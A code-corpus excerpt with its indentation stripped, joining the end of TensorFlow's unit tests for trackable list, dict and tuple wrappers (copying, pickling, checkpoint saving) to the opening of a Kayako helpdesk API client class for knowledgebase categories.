self.assertEqual(list(l * 2), [v, v, v] * 2)
def testRMul(self):
v = resource_variable_ops.ResourceVariable(1.)
l = data_structures.List([v, v, v])
self.assertEqual(list(2 * l), [v, v, v] * 2)
class ListWrapperTest(test.TestCase):
IGNORED = ("__new__", "__init__", "__subclasshook__", "__getattribute__")
def test_overrides_all_list_methods(self):
not_overridden = []
for name in dir(list):
if name in ListWrapperTest.IGNORED:
continue
list_method = getattr(list, name)
if not callable(list_method):
continue
object_method = getattr(object, name, None)
if object_method is not None and object_method == list_method:
# Skip methods that aren't overridden from object.
continue
if list_method == getattr(data_structures.ListWrapper, name):
not_overridden.append(name)
if not_overridden:
self.fail("ListWrapper does not override %s" % (not_overridden))
def testPickle(self):
original = data_structures.ListWrapper([1, 2])
serialized = pickle.dumps(original)
del original
deserialized = pickle.loads(serialized)
self.assertEqual([1, 2], deserialized)
def testSameStructure(self):
l = [1]
nest.assert_same_structure(l, data_structures.ListWrapper(copy.copy(l)))
def testFunctionCaching(self):
@def_function.function
def f(list_input):
return list_input[0] + constant_op.constant(1.)
first_trace = f.get_concrete_function([constant_op.constant(2.)])
second_trace = f.get_concrete_function(
data_structures.ListWrapper([constant_op.constant(3.)]))
self.assertIs(first_trace, second_trace)
def testListWrapperBasic(self):
# ListWrapper, unlike List, compares like the built-in list type (since it
# is used to automatically replace lists).
a = tracking.AutoTrackable()
b = tracking.AutoTrackable()
self.assertEqual([a, a],
[a, a])
self.assertEqual(data_structures.ListWrapper([a, a]),
data_structures.ListWrapper([a, a]))
self.assertEqual([a, a],
data_structures.ListWrapper([a, a]))
self.assertEqual(data_structures.ListWrapper([a, a]),
[a, a])
self.assertNotEqual([a, a],
[b, a])
self.assertNotEqual(data_structures.ListWrapper([a, a]),
data_structures.ListWrapper([b, a]))
self.assertNotEqual([a, a],
data_structures.ListWrapper([b, a]))
self.assertLess([a], [a, b])
self.assertLess(data_structures.ListWrapper([a]),
data_structures.ListWrapper([a, b]))
self.assertLessEqual([a], [a, b])
self.assertLessEqual(data_structures.ListWrapper([a]),
data_structures.ListWrapper([a, b]))
self.assertGreater([a, b], [a])
self.assertGreater(data_structures.ListWrapper([a, b]),
data_structures.ListWrapper([a]))
self.assertGreaterEqual([a, b], [a])
self.assertGreaterEqual(data_structures.ListWrapper([a, b]),
data_structures.ListWrapper([a]))
self.assertEqual([a], data_structures.ListWrapper([a]))
self.assertEqual([a], list(data_structures.List([a])))
self.assertEqual([a, a], data_structures.ListWrapper([a]) + [a])
self.assertEqual([a, a], [a] + data_structures.ListWrapper([a]))
self.assertIsInstance(data_structures.ListWrapper([a]), list)
self.assertEqual(
tensor_shape.TensorShape([None, 2]).as_list(),
(data_structures.ListWrapper([None])
+ tensor_shape.TensorShape([2])).as_list())
def testAcceptsNonTrackableContent(self):
l = data_structures.ListWrapper([1, 2, 3])
self.assertEqual(l, [1, 2, 3])
def testWrapperChangesList(self):
l = []
l_wrapper = data_structures.ListWrapper(l)
l_wrapper.append(1)
self.assertEqual([1], l)
def testListChangesWrapper(self):
l = []
l_wrapper = data_structures.ListWrapper(l)
l.append(1)
self.assertEqual([1], l_wrapper)
def testLayerCollectionWithExternalMutation(self):
l = []
l_wrapper = data_structures.ListWrapper(l)
layer = core.Dense(1)
l.append(layer)
self.assertEqual([layer], l_wrapper.layers)
def testNotHashable(self):
with self.assertRaises(TypeError):
hash(data_structures.ListWrapper())
def testDelItem(self):
l = data_structures.ListWrapper([1, 2, 3, 4])
del l[0]
self.assertEqual(l, [2, 3, 4])
self.assertUnableToSave(l, "Unable to save .*__delitem__")
def testDelSlice(self):
l = data_structures.ListWrapper([1, 2, 3, 4])
del l[2:3]
self.assertEqual(l, [1, 2, 4])
self.assertUnableToSave(l, "Unable to save .*__delslice__")
def testSetSlice_canSaveForNonTrackableItems(self):
l = data_structures.ListWrapper([1, 2, 3, 4])
l[:] = 2, 8, 9, 0
self.assertEqual(l, [2, 8, 9, 0])
l._maybe_initialize_trackable() # pylint: disable=protected-access
self.assertEqual(len(l._checkpoint_dependencies), 0) # pylint: disable=protected-access
def testSetSlice_cannotSaveIfTrackableModified(self):
v1 = resource_variable_ops.ResourceVariable(1.)
v2 = resource_variable_ops.ResourceVariable(1.)
l = data_structures.ListWrapper([1, 2, v1, v2])
l[:] = 2, 8, 9, v2
self.assertEqual(l, [2, 8, 9, v2])
self.assertUnableToSave(l, "Unable to save .*__setslice__")
def testSetSlice_truncate(self):
l = data_structures.ListWrapper([1, 2, 3, 4])
l[:] = []
self.assertEqual(l, [])
def testSetSlice_extend(self):
l = data_structures.ListWrapper([1, 2, 3, 4])
l[2:] = 1, 2, 3, 4
self.assertEqual(l, [1, 2, 1, 2, 3, 4])
def testIMulNegative(self):
l = data_structures.ListWrapper([1, 2, 3, 4])
l *= -1
self.assertEqual(l, [1, 2, 3, 4] * -1)
self.assertUnableToSave(l, "Unable to save")
def testIMulPositive(self):
v = variables.Variable(1.)
l = data_structures.ListWrapper([1, 2, 3, 4, v])
self.assertEqual([("4", v)], l._checkpoint_dependencies)
root = util.Checkpoint(l=l)
prefix = os.path.join(self.get_temp_dir(), "ckpt")
path = root.save(prefix)
v.assign(5.)
l *= 2
self.assertEqual(l, [1, 2, 3, 4, v, 1, 2, 3, 4, v])
self.assertEqual([("4", v), ("9", v)], l._checkpoint_dependencies)
root.restore(path)
self.assertAllClose(1., v.numpy())
def testSort(self):
l = data_structures.ListWrapper([1, 2, 3, 4])
l.sort()
self.assertEqual(l, [1, 2, 3, 4])
    # Even though sorting is a no-op for this input list, we still refuse to save.
# This is intentional since otherwise we would end up with a hard to debug
# case for users (e.g. sometimes sort on a ListWrapper is trackable and
# other times it is not).
self.assertUnableToSave(l, "Unable to save .*sort")
def assertUnableToSave(self, l, msg):
l._maybe_initialize_trackable() # pylint: disable=protected-access
with self.assertRaisesRegexp(ValueError, msg):
return l._checkpoint_dependencies # pylint: disable=protected-access
class HasMapping(training.Model):
def __init__(self):
super(HasMapping, self).__init__()
self.layer_dict = data_structures.Mapping(output=core.Dense(7))
self.layer_dict["norm"] = data_structures.List()
self.layer_dict["dense"] = data_structures.List()
self.layer_dict["dense"].extend(
[core.Dense(5),
core.Dense(6, kernel_regularizer=math_ops.reduce_sum)])
self.layer_dict["norm"].append(
normalization.BatchNormalization())
self.layer_dict["norm"].append(
normalization.BatchNormalization())
def call(self, x):
aggregation = 0.
for norm, dense in zip(self.layer_dict["norm"], self.layer_dict["dense"]):
x = norm(dense(x))
aggregation += math_ops.reduce_sum(x)
return self.layer_dict["output"](x) / aggregation
class MappingTests(test.TestCase):
@test_util.run_in_graph_and_eager_modes
def testTracking(self):
model = HasMapping()
output = model(array_ops.ones([32, 2]))
self.assertAllEqual([32, 7], output.shape.as_list())
self.assertEqual(5, len(model.layers))
six.assertCountEqual(self, model.layers, model.layer_dict.layers)
self.assertEqual(1, len(model._checkpoint_dependencies))
self.assertIs(model.layer_dict, model._checkpoint_dependencies[0].ref)
self.evaluate([v.initializer for v in model.variables])
test_var = model.layer_dict["output"].kernel
self.evaluate(test_var.assign(array_ops.ones([6, 7])))
save_path = os.path.join(self.get_temp_dir(), "ckpt")
model.save_weights(save_path)
self.evaluate(test_var.assign(array_ops.zeros([6, 7])))
model.load_weights(save_path)
self.assertAllEqual(numpy.ones([6, 7]),
self.evaluate(test_var))
def testJSONSerialization(self):
obj = tracking.AutoTrackable()
obj.d = {"a": 2}
json.dumps(obj.d, default=serialization.get_json_type)
def testNoOverwrite(self):
mapping = data_structures.Mapping()
original = data_structures.List()
mapping["a"] = original
with self.assertRaises(ValueError):
mapping["a"] = data_structures.List()
self.assertIs(original, mapping["a"])
with self.assertRaises(AttributeError):
del mapping["a"]
mapping.update(b=data_structures.Mapping())
with self.assertRaises(ValueError):
mapping.update({"b": data_structures.Mapping()})
def testNonStringKeys(self):
mapping = data_structures.Mapping()
with self.assertRaises(TypeError):
mapping[1] = data_structures.List()
def testLayerCollectionWithExternalMutation(self):
d = {}
root = tracking.AutoTrackable()
root.wrapper = d
self.assertEqual([], root.wrapper.layers)
self.assertEqual([], root.wrapper.trainable_weights)
layer1 = core.Dense(1)
layer2 = core.Dense(1)
d["a"] = layer1
d["b"] = layer2
self.assertEqual([layer1, layer2], root.wrapper.layers)
# The layers have still not created variables
self.assertEqual([], root.wrapper.trainable_weights)
def testHashing(self):
has_mappings = set([data_structures.Mapping(),
data_structures.Mapping()])
self.assertEqual(2, len(has_mappings))
self.assertNotIn(data_structures.Mapping(), has_mappings)
# In contrast to Mapping, dict wrappers are not hashable
a = tracking.AutoTrackable()
a.d = {}
self.assertEqual({}, a.d)
self.assertFalse({} != a.d) # pylint: disable=g-explicit-bool-comparison
self.assertNotEqual({1: 2}, a.d)
with self.assertRaisesRegexp(TypeError, "unhashable"):
set([a.d])
def testDictWrapperBadKeys(self):
a = tracking.AutoTrackable()
a.d = {}
a.d[1] = data_structures.List()
model = training.Model()
model.sub = a
save_path = os.path.join(self.get_temp_dir(), "ckpt")
with self.assertRaisesRegexp(ValueError, "non-string key"):
model.save_weights(save_path)
def testDictWrapperNoDependency(self):
a = tracking.AutoTrackable()
a.d = data_structures.NoDependency({})
a.d[1] = [3]
self.assertEqual([a], util.list_objects(a))
model = training.Model()
model.sub = a
save_path = os.path.join(self.get_temp_dir(), "ckpt")
model.save_weights(save_path)
model.load_weights(save_path)
def testNonStringKeyNotTrackableValue(self):
a = tracking.AutoTrackable()
a.d = {}
a.d["a"] = [3]
a.d[1] = data_structures.NoDependency([3])
self.assertEqual([a, a.d, a.d["a"]], util.list_objects(a))
model = training.Model()
model.sub = a
save_path = os.path.join(self.get_temp_dir(), "ckpt")
model.save_weights(save_path)
model.load_weights(save_path)
def testNonAppendNotTrackable(self):
# Non-append mutations (deleting or overwriting values) are OK when the
# values aren't tracked.
a = tracking.AutoTrackable()
a.d = {}
a.d["a"] = [3]
a.d[1] = 3
a.d[1] = 2
self.assertEqual(2, a.d[1])
del a.d[1]
a.d[2] = data_structures.NoDependency(tracking.AutoTrackable())
second = tracking.AutoTrackable()
a.d[2] = data_structures.NoDependency(second)
self.assertIs(second, a.d[2])
self.assertEqual([a, a.d, a.d["a"]], util.list_objects(a))
model = training.Model()
model.sub = a
save_path = os.path.join(self.get_temp_dir(), "ckpt")
model.save_weights(save_path)
model.load_weights(save_path)
def testPopNoSave(self):
model = training.Model()
model.d = {}
model.d["a"] = []
model.d.pop("a")
save_path = os.path.join(self.get_temp_dir(), "ckpt")
with self.assertRaisesRegexp(ValueError, "Unable to save"):
model.save_weights(save_path)
def testExternalModificationNoSave(self):
model = training.Model()
external_reference = {}
model.d = external_reference
external_reference["a"] = []
save_path = os.path.join(self.get_temp_dir(), "ckpt")
with self.assertRaisesRegexp(ValueError, "modified outside the wrapper"):
model.save_weights(save_path)
def testOverwriteCanStillSave(self):
model = training.Model()
model.d = {}
model.d["a"] = {}
model.d["a"] = {}
save_path = os.path.join(self.get_temp_dir(), "ckpt")
model.save_weights(save_path)
def testIter(self):
model = training.Model()
model.d = {1: 3}
model.d[1] = 3
self.assertEqual([1], list(model.d))
new_dict = {}
# This update() is super tricky. If the dict wrapper subclasses dict,
# CPython will access its storage directly instead of calling any
# methods/properties on the object. So the options are either not to
# subclass dict (in which case update will call normal iter methods, but the
# object won't pass isinstance checks) or to subclass dict and keep that
    # storage updated (without shadowing all its methods the way ListWrapper does).
new_dict.update(model.d)
self.assertEqual({1: 3}, new_dict)
def testListShallowCopy(self):
root = tracking.AutoTrackable()
orig_list = [[1.]]
root.a = orig_list
copied = copy.copy(root.a)
self.assertAllEqual([[1.]], copied)
self.assertIsNot(root.a, copied)
self.assertIs(root.a[0], copied[0])
# Dirtiness should be inherited
util.list_objects(root.a)
orig_list.append(1.)
with self.assertRaises(ValueError):
util.list_objects(root.a)
with self.assertRaises(ValueError):
util.list_objects(copy.copy(root.a))
def testListDeepCopy(self):
root = tracking.AutoTrackable()
orig_list = [[1.]]
root.a = orig_list
copied = copy.deepcopy(root.a)
self.assertAllEqual([[1.]], copied)
self.assertIsNot(root.a, copied)
self.assertIsNot(root.a[0], copied[0])
# Dirtiness should be inherited
util.list_objects(root.a)
orig_list.append(1.)
with self.assertRaises(ValueError):
util.list_objects(root.a)
with self.assertRaises(ValueError):
util.list_objects(copy.deepcopy(root.a))
def testDictShallowCopy(self):
root = tracking.AutoTrackable()
orig_dict = {"a": [1.]}
root.a = orig_dict
copied = copy.copy(root.a)
self.assertAllEqual([1.], copied["a"])
self.assertIsNot(root.a, copied)
self.assertIs(root.a["a"], copied["a"])
copied = root.a.copy()
self.assertAllEqual([1.], copied["a"])
self.assertIsNot(root.a, copied)
self.assertIs(root.a["a"], copied["a"])
# Dirtiness should be inherited
util.list_objects(root.a)
orig_dict["b"] = []
with self.assertRaises(ValueError):
util.list_objects(root.a)
with self.assertRaises(ValueError):
util.list_objects(copy.copy(root.a))
def testDictDeepCopy(self):
root = tracking.AutoTrackable()
orig_dict = {"a": [1.]}
root.a = orig_dict
copied = copy.deepcopy(root.a)
self.assertAllEqual([1.], copied["a"])
self.assertIsNot(root.a, copied)
self.assertIsNot(root.a["a"], copied["a"])
# Dirtiness should be inherited
util.list_objects(root.a)
orig_dict["b"] = []
with self.assertRaises(ValueError):
util.list_objects(root.a)
with self.assertRaises(ValueError):
util.list_objects(copy.deepcopy(root.a))
def testShallowCopyTrackable(self):
original = tracking.AutoTrackable()
original_sub = tracking.AutoTrackable()
original.a = [[1.]]
original.b = {"a": original_sub}
shallow_copied = copy.copy(original)
self.assertIs(original_sub, shallow_copied.b["a"])
self.assertIsNot(original, shallow_copied)
self.assertEqual([[1.]], shallow_copied.a)
shallow_deps = util.list_objects(shallow_copied)
self.assertIn(shallow_copied.a, shallow_deps)
self.assertIn(shallow_copied.b, shallow_deps)
self.assertIn(shallow_copied.b["a"], shallow_deps)
def testDeepCopyTrackable(self):
original = tracking.AutoTrackable()
original_sub = tracking.AutoTrackable()
original.a = [[1.]]
original.b = {"a": original_sub}
self.assertIsInstance(original.b, dict)
deep_copied = copy.deepcopy(original)
self.assertIsInstance(deep_copied.b, dict)
self.assertIsNot(original, deep_copied)
self.assertIsNot(original_sub, deep_copied.b["a"])
self.assertEqual([[1.]], deep_copied.a)
self.assertIsInstance(deep_copied.b["a"], tracking.AutoTrackable)
deps = util.list_objects(deep_copied)
self.assertIn(deep_copied.a, deps)
self.assertIn(deep_copied.b, deps)
self.assertIn(deep_copied.b["a"], deps)
self.assertNotIn(original_sub, deps)
def testConstructableFromSequence(self):
result = data_structures._DictWrapper([(1, 2), (3, 4)])
self.assertIsInstance(result, dict)
self.assertEqual({1: 2, 3: 4}, result)
def testPickle(self):
original = data_structures._DictWrapper(dict(a=1, b=2))
serialized = pickle.dumps(original)
del original
deserialized = pickle.loads(serialized)
self.assertEqual(dict(a=1, b=2), deserialized)
def testListAddOrder(self):
self.assertEqual([1., 2.],
data_structures.ListWrapper([1.])
+ data_structures.ListWrapper([2.]))
self.assertEqual([1., 2.],
data_structures.ListWrapper([1.])
+ [2.])
self.assertEqual([1., 2.],
[1.]
+ data_structures.ListWrapper([2.]))
def testSameStructure(self):
d = {1: "a"}
nest.assert_same_structure(d, data_structures._DictWrapper(d.copy()))
def testFunctionCaching(self):
@def_function.function
def f(dict_input):
return dict_input["x"] + constant_op.constant(1.)
first_trace = f.get_concrete_function({"x": constant_op.constant(2.)})
second_trace = f.get_concrete_function(
data_structures._DictWrapper({"x": constant_op.constant(3.)}))
self.assertIs(first_trace, second_trace)
class HasTuple(training.Model):
def __init__(self):
super(HasTuple, self).__init__()
self.layer_list = (
core.Dense(3), core.Dense(4),
core.Dense(5, kernel_regularizer=math_ops.reduce_sum))
self.layers_with_updates = (normalization.BatchNormalization(),)
def call(self, x):
aggregation = 0.
for l in self.layer_list:
x = l(x)
aggregation += math_ops.reduce_sum(x)
bn, = self.layers_with_updates
return bn(x) / aggregation
class TupleTests(test.TestCase, parameterized.TestCase):
@test_util.run_in_graph_and_eager_modes
def testTracking(self):
model = HasTuple()
output = model(array_ops.ones([32, 2]))
self.assertAllEqual([32, 5], output.shape.as_list())
self.assertLen(model.layers, 4)
self.assertLen(model.layer_list.layers, 3)
six.assertCountEqual(
self,
model.layers,
tuple(model.layer_list.layers) + model.layers_with_updates)
self.assertEqual(3, model.layer_list.layers[0].units)
self.assertEqual(4, model.layer_list.layers[1].units)
self.assertEqual(5, model.layer_list.layers[2].units)
self.assertLen(model._checkpoint_dependencies, 2)
self.assertIs(model.layer_list, model._checkpoint_dependencies[0].ref)
self.assertIs(model.layers_with_updates,
model._checkpoint_dependencies[1].ref)
self.assertLen(
model._checkpoint_dependencies[0].ref._checkpoint_dependencies, 3)
self.evaluate([v.initializer for v in model.variables])
self.evaluate(model.variables[0].assign([[1., 2., 3.], [4., 5., 6.]]))
save_path = os.path.join(self.get_temp_dir(), "ckpt")
model.save_weights(save_path)
self.evaluate(model.variables[0].assign(array_ops.zeros([2, 3])))
model.load_weights(save_path)
self.assertAllEqual([[1., 2., 3.], [4., 5., 6.]],
self.evaluate(model.variables[0]))
v = variables.Variable(1.)
model.var_list = (v,)
self.assertIn(id(v), [id(obj) for obj in model.variables])
self.assertIn(id(v), [id(obj) for obj in model.trainable_variables])
self.assertNotIn(id(v), [id(obj) for obj in model.non_trainable_variables])
self.assertIn(id(model.layer_list[0].trainable_weights[0]),
[id(obj) for obj in model.trainable_weights])
@parameterized.named_parameters(
("Module", module.Module),
("Model", training.Model),
)
def testSubModelTracking(self, module_subclass):
model = module_subclass()
model.v = variables.Variable(1.)
self.assertIn(model.v, model.trainable_variables)
model2 = module_subclass()
model2.m = (model,)
self.assertIn(model.v, model2.trainable_variables)
def testSubSequentialTracking(self):
class _Subclassed(training.Model):
def __init__(self, wrapped):
super(_Subclassed, self).__init__()
self._wrapped = wrapped
def call(self, x):
return self._wrapped(x)
model = sequential.Sequential()
layer = core.Dense(1)
model.add(layer)
model2 = _Subclassed(model)
model2(array_ops.ones([1, 2]))
model2.m = (model,)
self.assertIn(layer.kernel, model2.trainable_weights)
def testJSONSerialization(self):
obj = tracking.AutoTrackable()
obj.l = (1,)
json.dumps(obj.l, default=serialization.get_json_type)
def testUpdatesForwarded(self):
with ops.Graph().as_default():
model = HasTuple()
model_input = array_ops.ones([32, 2])
model(model_input)
self.assertNotEmpty(model.layers_with_updates[0].updates)
self.assertEqual(set(model.layers_with_updates[0].updates),
set(model.updates))
model = HasTuple()
model_input = array_ops.ones([32, 2])
model(model_input)
self.assertEmpty(model.updates)
@test_util.run_in_graph_and_eager_modes
def testLossesForwarded(self):
model = HasTuple()
model_input = array_ops.ones([32, 2])
model(model_input)
self.assertLen(model.losses, 1)
def testModelContainersCompareEqual(self):
class HasEqualContainers(training.Model):
def __init__(self):
super(HasEqualContainers, self).__init__()
self.l1 = ()
self.l2 = ()
model = HasEqualContainers()
first_layer = HasEqualContainers()
model.l1 = (first_layer,)
second_layer = HasEqualContainers()
model.l2 = (second_layer,)
self.assertEqual((first_layer,), model.l1)
d = {model.l1: 1, model.l2: 2}
self.assertEqual(1, d[model.l1])
self.assertEqual(1, d[(first_layer,)])
self.assertEqual(2, d[model.l2])
self.assertEqual(2, d[(second_layer,)])
self.assertEqual([first_layer, second_layer], model.layers)
@test_util.run_in_graph_and_eager_modes
def testTensorConversion(self):
class TupleToTensor(training.Model):
def __init__(self):
super(TupleToTensor, self).__init__()
self.l = (1., 2., 3.)
self.assertAllEqual(
(1., 2., 3.),
self.evaluate(constant_op.constant(TupleToTensor().l)))
self.assertAllEqual(
(1., 2., 3.),
self.evaluate(array_ops.pack(TupleToTensor().l)))
def testNonLayerVariables(self):
v = resource_variable_ops.ResourceVariable([1.])
l = data_structures._TupleWrapper((v,))
self.assertEqual([], l.layers)
self.assertEqual([v], l.variables)
self.assertEqual([v], l.trainable_weights)
self.assertEqual([], l.non_trainable_variables)
def testCopy(self):
v1 = resource_variable_ops.ResourceVariable(1.)
v2 = resource_variable_ops.ResourceVariable(1.)
l1 = data_structures._TupleWrapper((v1, v2))
l2 = copy.copy(l1)
self.assertEqual(l1, (v1, v2))
self.assertEqual(l2, (v1, v2))
self.assertIs(l1[0], l2[0])
l2_deep = copy.deepcopy(l1)
self.assertIsNot(l1[0], l2_deep[0])
with self.assertRaises(AttributeError):
l2.append(v1)
def testSlicing(self):
v1 = resource_variable_ops.ResourceVariable(1.)
v2 = resource_variable_ops.ResourceVariable(1.)
v3 = resource_variable_ops.ResourceVariable(1.)
v4 = resource_variable_ops.ResourceVariable(1.)
l = data_structures._TupleWrapper((v1, v2, v3, v4))
self.assertEqual(l[1:], (v2, v3, v4))
self.assertEqual(l[1:-1], (v2, v3))
self.assertEqual(l[:-1], (v1, v2, v3))
def testHash(self):
has_sequences = set([data_structures._TupleWrapper(),
data_structures._TupleWrapper()])
self.assertLen(has_sequences, 1)
self.assertIn(data_structures._TupleWrapper(), has_sequences)
def testIMul_zero(self):
l = data_structures._TupleWrapper((1,))
l *= 0
self.assertEqual((), l)
def testIMul(self):
# Note: tuple behavior differs from list behavior. Lists are mutated by
# imul/iadd, tuples assign a new object to the left hand side of the
# expression.
v = resource_variable_ops.ResourceVariable(1.)
l = data_structures._TupleWrapper((v,))
original = l
l *= 2
self.assertEqual(l, (v,) * 2)
self.assertNotEqual(original, (v,) * 2)
def testIAdd(self):
v = resource_variable_ops.ResourceVariable(1.)
l = data_structures._TupleWrapper((v,))
original = l
l += (1,)
self.assertEqual(l, (v, 1))
self.assertNotEqual(original, (v, 1))
self.assertEqual(original, (v,))
def testMul(self):
v = resource_variable_ops.ResourceVariable(1.)
l = data_structures._TupleWrapper((v, v, v))
self.assertEqual(l * 2, (v, v, v) * 2)
def testRMul(self):
v = resource_variable_ops.ResourceVariable(1.)
l = data_structures._TupleWrapper((v, v, v))
self.assertEqual(2 * l, (v, v, v) * 2)
def testPickle(self):
original = data_structures._TupleWrapper((1, 2))
serialized = pickle.dumps(original)
del original
deserialized = pickle.loads(serialized)
self.assertEqual((1, 2), deserialized)
def testNamedTuple(self):
named = collections.namedtuple("Named", ("x", "y"))
v = variables.Variable(2)
nt = named(x=v, y=2)
m = module.Module()
m.nt = nt
self.assertIs(v, m.nt.x)
self.assertIs(v, m.nt[0])
self.assertIs(
v, m._checkpoint_dependencies[0].ref._checkpoint_dependencies[0].ref)
self.assertEqual(2, m.nt.y)
def testNamedSubclassing(self):
named = collections.namedtuple("Named", ("x", "y"))
v = variables.Variable(2)
class NamedSubclass(named):
def __new__(cls, x, y):
del y # unused
return super(NamedSubclass, cls).__new__(cls, x, 3)
@property
def summed(self):
return self.x + self.y
nt = NamedSubclass(x=v, y=2)
m = module.Module()
m.nt = nt
self.assertEqual(3, m.nt.y)
self.assertIs(v, m.nt.x)
self.assertIs(
v, m._checkpoint_dependencies[0].ref._checkpoint_dependencies[0].ref)
self.assertEqual("x", m.nt._checkpoint_dependencies[0].name)
self.assertEqual("0", m.nt._checkpoint_dependencies[1].name)
self.assertEqual(5, self.evaluate(m.nt.summed))
def testUnnamedSubclassing(self):
v = variables.Variable(2)
class UnnamedSubclass(tuple):
@property
def summed(self):
return self[0] + self[1]
unt = UnnamedSubclass([v, 2])
m = module.Module()
m.unt = unt
self.assertEqual("0", m.unt._checkpoint_dependencies[0].name)
self.assertLen(m.unt._checkpoint_dependencies, 1)
self.assertEqual(4, self.evaluate(m.unt.summed))
nest.assert_same_structure(
[m.unt], nest.map_structure(lambda x: x, [m.unt]))
def testNamedtupleSubclassWithCustomNew(self):
class SubclassWithDifferentArgs(collections.namedtuple("A", ["x"])):
def __new__(cls):
return super(SubclassWithDifferentArgs, cls).__new__(cls, [])
nt = SubclassWithDifferentArgs()
m = module.Module()
m.nt = nt
m.nt.x.append(variables.Variable(1.))
prefix = os.path.join(self.get_temp_dir(), "ckpt")
ckpt = util.Checkpoint(m=m)
with self.assertRaises(ValueError):
ckpt.save(prefix)
def testSameStructure(self):
t = (variables.Variable(1.),)
m = module.Module()
m.t = t
nest.assert_same_structure(t, m.t)
nest.assert_same_structure(m.t, t)
nt_type = collections.namedtuple("nt", ["x", "y"])
nt = nt_type(x=1, y=2)
m.nt = nt
nest.assert_same_structure(m.nt, nt)
with self.assertRaises(TypeError): # pylint: disable=g-error-prone-assert-raises
nest.assert_same_structure(m.nt, m.t)
def testFlatten(self):
t = data_structures._TupleWrapper((1, data_structures._TupleWrapper((2,))))
self.assertEqual([1, 2], nest.flatten(t))
self.assertEqual(
nest.flatten_with_tuple_paths((1, (2,))),
nest.flatten_with_tuple_paths(t))
self.assertEqual((3, (4,)),
nest.pack_sequence_as(t, [3, 4]))
nt_type = collections.namedtuple("nt", ["x", "y"])
nt = nt_type(1., 2.)
wrapped_nt = data_structures._TupleWrapper(nt)
self.assertEqual(
nest.flatten_with_tuple_paths(nt),
nest.flatten_with_tuple_paths(wrapped_nt))
self.assertEqual((3, 4,),
nest.pack_sequence_as(wrapped_nt, [3, 4]))
self.assertEqual(3, nest.pack_sequence_as(wrapped_nt, [3, 4]).x)
def testFunctionCaching(self):
@def_function.function
def f(tuple_input):
return tuple_input[0] + constant_op.constant(1.)
first_trace = f.get_concrete_function((constant_op.constant(2.),))
second_trace = f.get_concrete_function(
data_structures._TupleWrapper((constant_op.constant(3.),)))
self.assertIs(first_trace, second_trace)
def testPythonMapImpl(self):
t = data_structures._TupleWrapper((1, data_structures._TupleWrapper((2,))))
self.assertEqual(
(4, (5,)),
nest.map_structure_up_to((None, (None,)), lambda x: x + 3, t,
check_types=True))
nest.assert_shallow_structure((None, None), t)
def testDatasetMap(self):
dataset = dataset_ops.Dataset.from_tensor_slices(
constant_op.constant([1, 2, 3]))
dataset = dataset.map(lambda x: data_structures._TupleWrapper((x,)))
for index, element in enumerate(dataset):
self.assertEqual((index + 1,), self.evaluate(element))
def testDatasetMapNamed(self):
nt_type = collections.namedtuple("A", ["x"])
dataset = dataset_ops.Dataset.from_tensor_slices(
constant_op.constant([1, 2, 3]))
dataset = dataset.map(lambda x: data_structures._TupleWrapper(nt_type(x)))
for index, element in enumerate(dataset):
self.assertEqual((index + 1,), self.evaluate(element))
def testLoopAssignedModule(self):
m = module.Module()
m.s = (m,)
self.assertLen(m._checkpoint_dependencies, 1)
self.assertIs(m.s, m._checkpoint_dependencies[0].ref)
self.assertIs("s", m._checkpoint_dependencies[0].name)
self.assertEqual((), m.trainable_variables)
if __name__ == "__main__":
test.main()
| gunan/tensorflow | tensorflow/python/training/tracking/data_structures_test.py | Python | apache-2.0 | 43,039 |
# -*- coding: utf-8 -*-
#-----------------------------------------------------------------------------
# Copyright (c) 2014, Ravi Sharma
#
# Distributed under the terms of the Lesser GNU General Public License (LGPL)
#-----------------------------------------------------------------------------
'''
Created on Jan 15, 2014
@author: Ravi Sharma
'''
from lxml import etree
from kayako.core.lib import UnsetParameter
from kayako.core.object import KayakoObject
from kayako.exception import KayakoRequestError, KayakoResponseError
class KnowledgebaseCategory(KayakoObject):
'''
Knowledgebase Category API Object.
title The title of the Category.
categorytype Category type. Global: 1, public: 2, private:3, inherit: 4.
parentkbcategoryid The parent category ID.
    displayorder            A positive integer that the helpdesk will use to sort Categories when displaying them (ascending).
    articlesortorder        An article sort order. Sort inherit: 1, sort title: 2, sort rating: 3, sort creationdate: 4, sort displayorder: 5.
allowcomments 1 or 0 boolean that controls whether or not to Allow comments of this category.
allowrating 1 or 0 boolean that controls whether or not to Allow rating of this category.
ispublished Toggle the published yes/no property using this flag.
uservisibilitycustom 1 or 0 boolean that controls whether or not to restrict visibility of this category to particular user groups.
usergroupidlist A list of usergroup id's identifying the user groups to be assigned to this category (see usergroupidlist[]).
staffvisibilitycustom Toggle the staff visibility custom yes/no property using this flag.
staffgroupidlist The staff group ID list. Multiple values can be comma separated like 1,2,3.
staffid The creator staff ID.
'''
controller = '/Knowledgebase/Category'
__parameters__ = ['id', 'title', 'categorytype', 'parentkbcategoryid', 'displayorder', 'totalarticles', 'articlesortorder', 'allowcomments', 'allowrating', 'ispublished', 'uservisibilitycustom',
'usergroupidlist', 'staffvisibilitycustom', 'staffgroupidlist', 'staffid']
__required_add_parameters__ = ['title', 'categorytype']
__add_parameters__ = ['id', 'title', 'categorytype', 'parentkbcategoryid', 'displayorder', 'articlesortorder', 'allowcomments', 'allowrating', 'ispublished', 'uservisibilitycustom',
'usergroupidlist', 'staffvisibilitycustom', 'staffgroupidlist', 'staffid']
__required_save_parameters__ = ['title', 'categorytype']
__save_parameters__ = ['id', 'title', 'categorytype', 'parentkbcategoryid', 'displayorder', 'articlesortorder', 'allowcomments', 'allowrating', 'ispublished', 'uservisibilitycustom',
'usergroupidlist', 'staffvisibilitycustom', 'staffgroupidlist', 'staffid']
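    # A minimal usage sketch (an illustration, not part of the library). It
    # assumes an authenticated API connection object `api` (e.g. a KayakoAPI
    # instance) and only uses the classmethods and methods defined below:
    #
    #   categories = KnowledgebaseCategory.get_all(api, count=50, start=0)
    #   category = KnowledgebaseCategory.get(api, 1)
    #   category.title = 'FAQs'
    #   category.save()      # PUT to /Knowledgebase/Category/<id>
    #   category.delete()    # DELETE of /Knowledgebase/Category/<id>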
@classmethod
def _parse_knowledgebase_category(cls, api, _parse_knowledgebase_category):
usergroups = []
usergroups_node = _parse_knowledgebase_category.find('usergroupidlist')
if usergroups_node is not None:
for id_node in usergroups_node.findall('usergroupid'):
id = cls._get_int(id_node)
usergroups.append(id)
staffgroups = []
staffgroups_node = _parse_knowledgebase_category.find('staffgroupidlist')
if staffgroups_node is not None:
for id_node in staffgroups_node.findall('staffgroupid'):
id = cls._get_int(id_node)
staffgroups.append(id)
params = dict(
id=cls._get_int(_parse_knowledgebase_category.find('id')),
